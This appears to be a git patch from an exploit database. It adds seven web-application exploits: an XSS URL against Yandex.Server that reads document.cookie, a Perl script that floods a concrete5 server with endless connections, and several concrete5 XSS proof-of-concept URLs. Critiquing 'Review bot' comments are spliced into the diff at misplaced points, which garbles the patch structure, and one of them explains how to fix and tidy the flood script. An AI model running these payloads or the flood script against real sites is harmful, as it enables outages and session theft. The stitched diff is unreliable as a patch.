From 6a755b7b3d569d8b372a35c38eec75e189021970 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 8 Jun 2015 05:03:42 +0000
Subject: [PATCH] DB: 2015-06-08 7 new exploits
---
 files.csv | 7 ++++
 platforms/php/webapps/37224.txt | 9 +++++
 platforms/php/webapps/37225.pl | 58 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/37226.txt | 19 +++++++++++
 platforms/php/webapps/37227.txt | 15 +++++++++
 platforms/php/webapps/37228.txt | 15 +++++++++
 platforms/php/webapps/37229.txt | 15 +++++++++
 platforms/php/webapps/37230.txt | 15 +++++++++
 8 files changed, 153 insertions(+)
 create mode 100755 platforms/php/webapps/37224.txt
 create mode 100755 platforms/php/webapps/37225.pl
 create mode 100755 platforms/php/webapps/37226.txt
 create mode 100755 platforms/php/webapps/37227.txt
 create mode 100755 platforms/php/webapps/37228.txt
 create mode 100755 platforms/php/webapps/37229.txt
 create mode 100755 platforms/php/webapps/37230.txt
diff --git a/files.csv b/files.csv
index b38469b75..5fb98523c 100755
--- a/files.csv
+++ b/files.csv
@@ -33601,3 +33601,10 @@ id,file,description,date,author,platform,type,port
 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0
 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
+37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0
+37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0
+37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0
+37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
diff --git a/platforms/php/webapps/37224.txt b/platforms/php/webapps/37224.txt
new file mode 100755
index 000000000..093194ac5
--- /dev/null
+++ b/platforms/php/webapps/37224.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53622/info
+
+Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search/?text=%27);alert(document.cookie)//
\ No newline at end of file
diff --git a/platforms/php/webapps/37225.pl b/platforms/php/webapps/37225.pl
new file mode 100755
index 000000000..6473e6926
--- /dev/null
+++ b/platforms/php/webapps/37225.pl
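Review bot: The payload `%27);alert(document.cookie)//` only works if `text` is reflected inside a JavaScript string within a script block or inline handler — the `'` closes the string, `)` closes a call and `//` comments out the rest — so this is a JavaScript-context injection, not an HTML-body one, and the advisory should say so because HTML-entity encoding of `text` alone would not stop it. The remediation a reader wants is to JavaScript-string-escape (or JSON-encode) the search term where it is written into script, and to HTML-encode it separately where it is echoed into markup. The `document.cookie` demonstration additionally assumes the session cookie is not HttpOnly; that is inferred from the PoC rather than stated, and is worth noting as a mitigating control.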
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+#### p0c 2 [ DDos with RPC 'using simple PERL script]===>
+
+#!/usr/bin/perl
+
+use Socket;
+if (@ARGV < 2) { &usage }
+$rand=rand(10);
+$host = $ARGV[0];
+$dir = $ARGV[1];
+$host =~ s/(http:\/\/)//eg;
+for ($i=0; $i<66; $i--)
+{
+$user="w00t".$rand.$i;
+$data = "Aa"
+;
+$lenx = length $data;
+$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
+"Accept: */*\r\n".
+"Content-Type: application/x-www-form-urlencoded\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
+"Host: $host\r\n".
+"Content-Length: $lenx\r\n".
+"Connection: Keep-Alive\r\n".
+"Cache-Control: no-cache\r\n\r\n".
+"$data";
+my $port = "80";
+my $proto = getprotobyname('tcp');
+socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
+connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
+send(SOCKET,"$rpc", 0);
+syswrite STDOUT, "+" ;
+}
+print "\n\n";
+system('ping $host');
+sub usage {
+print "\tusage: \n";
+print "\t$0 \n";
+print "\Ex: $0 127.0.0.1 /concrete/\n";
+print "\Ex2: $0 target.com /\n\n";
+exit();
+};
+
+# << ThE|End
\ No newline at end of file
diff --git a/platforms/php/webapps/37226.txt b/platforms/php/webapps/37226.txt
new file mode 100755
index 000000000..f08360acb
--- /dev/null
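Review bot: The loop header `for ($i=0; $i<66; $i--)` decrements its counter, so `$i<66` never becomes false and the script floods the target indefinitely rather than sending the 66 requests the bound implies; the intended line is presumably `for ($i=0; $i<66; $i++)`. The final `system('ping $host');` is also broken as written: inside single quotes Perl does not interpolate `$host`, so the shell receives a literal `$host` (unset, hence empty) and `ping` just prints its usage; the list form `system('ping', '-c', '4', $host);` fixes the interpolation and keeps the hostname away from the shell. Nothing in the request is specific to rpc.php — the body is the two bytes `Aa`, no spellchecker JSON is sent, and the inline comment says `/index.php` works just as well — so this PoC demonstrates a generic connection flood, not a flaw in the spellchecker endpoint, and the CSV title "Remote DoS" should not be read as evidence of one. Each iteration reopens the bareword `SOCKET` without reading the response or closing it, and `|| redo` on a failed connect retries forever; adding `close(SOCKET);` after the `send` and bailing out on connect failure would make the script's behaviour bounded. The file also lacks `use strict; use warnings;`, which would have caught the unused `$user` and the `\E` escapes that silently eat the "E" in the usage text.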
+++ b/platforms/php/webapps/37226.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+
+http://www.example.com/concrete/flash/thumbnail_editor_2.swf
+http://www.example.com/concrete/flash/thumbnail_editor_3.swf
+http://www.example.com/concrete/flash/swfupload/swfupload.swf
+http://www.example.com/concrete/flash/uploader/uploader.swf
\ No newline at end of file
diff --git a/platforms/php/webapps/37227.txt b/platforms/php/webapps/37227.txt
new file mode 100755
index 000000000..27da3e450
--- /dev/null
+++ b/platforms/php/webapps/37227.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance=">&fID=4
\ No newline at end of file
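Review bot: The four `.swf` URLs are the entire PoC, and reaching a publicly served Flash component is not evidence of "arbitrary SWF file upload" — nothing in the hunk shows a request that uploads a file, the endpoint that accepts it, or where it lands. The entry would be far more useful with the actual upload request (URL, multipart field name, whether a session is needed) or, if the point is that these bundled SWFs are themselves abusable, a sentence saying so; as written it reads as a path listing. The version line "5.5 and 5.5.21" also disagrees with the sibling PoCs, which are taken against a `concrete5.5.2.1` install path, so 5.5.21 is presumably a typo for 5.5.2.1 and should be checked against the cited BID.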
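Review bot: The payload after `searchInstance=` is just `">`, which closes an attribute and its tag but carries no script, so as shown the PoC cannot produce the script execution the text describes; the original very likely had a `<script>` or event-handler payload here that was stripped in transit, and the line should be restored from the referenced BID before anyone relies on it. The `">` breakout does indicate that `searchInstance` is echoed into an HTML attribute without encoding, so the server-side fix is to HTML-encode it with quotes covered at the point of output, e.g. `htmlspecialchars($searchInstance, ENT_QUOTES, 'UTF-8')` or the application's equivalent helper. `fID=4` is not part of the injection and presumably only satisfies the tool's file lookup; whether the page renders without a valid session is not stated and should be.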
diff --git a/platforms/php/webapps/37228.txt b/platforms/php/webapps/37228.txt
new file mode 100755
index 000000000..0012a92a1
--- /dev/null
+++ b/platforms/php/webapps/37228.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance=">&fID=owned
\ No newline at end of file
diff --git a/platforms/php/webapps/37229.txt b/platforms/php/webapps/37229.txt
new file mode 100755
index 000000000..0a401b16d
--- /dev/null
+++ b/platforms/php/webapps/37229.txt
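Review bot: This PoC uses `fID=owned`, a non-numeric file ID, alongside the `">` breakout, but does not say whether `searchInstance` is reflected before or after the file lookup runs; that ordering matters for triage, because a reflection reachable with a bogus ID and no session is a much wider exposure than one gated behind a valid file and a login, and the entry records neither. As with the sibling entries the payload stops at `">` with no script body, which suggests the tag was lost in transit and should be verified against the cited BID. A one-line remediation note would help readers: encode `searchInstance` with quotes covered (`htmlspecialchars(..., ENT_QUOTES, 'UTF-8')`) where it is written into the attribute.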
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance=">&fID=owned
\ No newline at end of file
diff --git a/platforms/php/webapps/37230.txt b/platforms/php/webapps/37230.txt
new file mode 100755
index 000000000..a9bdd5552
--- /dev/null
+++ b/platforms/php/webapps/37230.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53640/info
+
+Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
+
+1. Multiple cross-site scripting vulnerabilities
+
+2. An arbitrary-file-upload vulnerability
+
+3. A denial-of-service vulnerability
+
+An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=">&node=owned&display_mode=full&select_mode=&selectedPageID=
\ No newline at end of file
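Review bot: This is the third sibling tool (`replace`, `add_to`, `permissions`) in which the same `searchInstance` parameter is reflected with the same `">` breakout, which suggests a single shared search-form include rather than three independent bugs; the entry should say that so a reader fixes the shared output point once instead of patching three views, though this is inferred from the matching PoCs, not stated in the advisory. The payload again ends at `">` without a script body and should be checked against the cited BID. Because `files/permissions` is a permissions-editing tool, whether it renders for an unauthenticated request is the key severity question and is left unanswered here.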
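Review bot: Only `instance_id` carries an injection (`">`) in this URL; `node=owned`, `display_mode=full`, `select_mode=` and `selectedPageID=` are plain values, so the PoC demonstrates at most one reflected parameter while the files.csv title calls it "Multiple Parameter XSS" — the other parameters are asserted, not shown, and the entry should either give a payload per parameter or trim the claim to `instance_id`. As with the other concrete5 entries the payload stops at `">`, which suggests the script portion was lost in transit. `tools/required/dashboard/sitemap_data.php` is a dashboard tool and presumably requires an admin session; stating that explicitly matters because it changes the issue from a drive-by reflected XSS into one that needs a logged-in administrator to follow the link.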